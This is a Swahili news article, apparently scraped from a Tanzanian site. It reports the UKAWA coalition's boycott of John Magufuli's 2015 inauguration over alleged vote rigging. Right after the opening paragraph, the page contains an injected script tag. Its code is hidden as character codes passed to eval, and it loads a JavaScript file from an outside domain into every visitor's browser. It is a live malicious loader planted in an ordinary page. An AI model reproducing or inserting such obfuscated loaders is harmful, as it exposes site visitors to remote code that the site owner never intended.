Recent Comments

UKAWA: Hatutohudhulia Sherehe za Kumuapisha Magufuli

By NaMwandishiWetu Nov 4, 2015
<p>UKAWA wasusia sherehe za kumuapisha Magufuli </p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
UKAWA wasusia sherehe za kumuapisha Magufuli
UKAWA wasusia sherehe
za kumuapisha Magufuli

 

 

Na Mwandishi Wetu, Dar es Salaam

WAKATI Rais mteule, Bw. John Magufuli anaapishwa kesho Jijini Dar es Salaam kushika nafasi ya urais wa Jamhuri ya Muungano wa Tanzania wa awamu ya tano, Umoja wa Katiba ya Wananchi Tanzania (UKAWA), wametangaza kususia sherehe hizo.

Taarifa kwa vyombo vya habari iliyotolewa Jijini Dar es Salaam leo imesema kuwa, hatua hiyo inafuatia kutoridhishwa kwao na mchakato wa uchaguzi hususan matokeo ya urais ambayo, kwa mujibu wa katibs ya nchi, yakishatangazwa hakuna haki ya kuyapinga katika mahakama yoyote ile.

“Hatutahudhuria shughuli hiyo ya kumwapisha Magufuli. Tumekubaliana wote kwenye UKAWA, ndani ya CHADEMA, viongozi wetu, wabunge wetu wote hawatahudhuria uapishwaji wala sherehe,’’ imesema taarifa hiyo.

Licha ya viongozi wa UKAWA na CHADEMA, taarifa hiyo pia imewataka Watanzania wote, wapenda mabadiliko na wapenda haki wote kwa ujumla kutohudhuria shughuli hiyo.

“Watawala wamechezea haki ya Watanzania kupiga kura. Kura zimehesabiwa kama karatasi za kawaida tu. Hujuma dhidi ya matokeo ya wagombea wetu imehujumiwa waziwazi. Safari hii hujuma hazikuwa kificho tena. Kila mtu amejionea matokeo yaliyokuwa yanatangazwa na Jaji Lubuva si yale ambayo yalikuwa yamebandikwa vituoni. Hayakuwa na uhalisia na matokeo yaliyokusanywa na mawakala,’’ imesema taarifa hiyo iliyotiwa saini na Tumaini Makene ambaye ni Mkuu wa Idara ya Habari na Mawasiliano.

Kwa mujibu wa taarifa hiyo, vyama vinavyounda UKAWA vimeitisha kikao cha wabunge wateule wote wa vyama hivyo. Kikao hicho kitafanyika kesho kuanzia saa nne asubuhi.

Wakati UKAWA wameweka msimamo huo, kesho imetangazwa kuwa siku ya mapumziko kwa nchi nzima, lengo likiwa kuwawezesha Watanzania kushiriki sherehe za kuhitimisha uongozi wa serikali ya awamu ya nne na kuingizwa madarakani Bw. Magufuli kuwa rais wa awamu ya tano wa Jamhuri ya Muungano wa Tanzania.

Taarifa iliyotolewa leo Jijini Dar es Saalaam na Ofisi ya Katibu Mkuu Kiongozi (KMK) Balozi Ombeni Sefue, imesema kuwa Rais Kikwete ametoa uamuzi huo kwa mujibu wa mamlaka aliyonayo chini ya kifungu cha 3 cha Sheri ya Sikukuu za Kitaifa.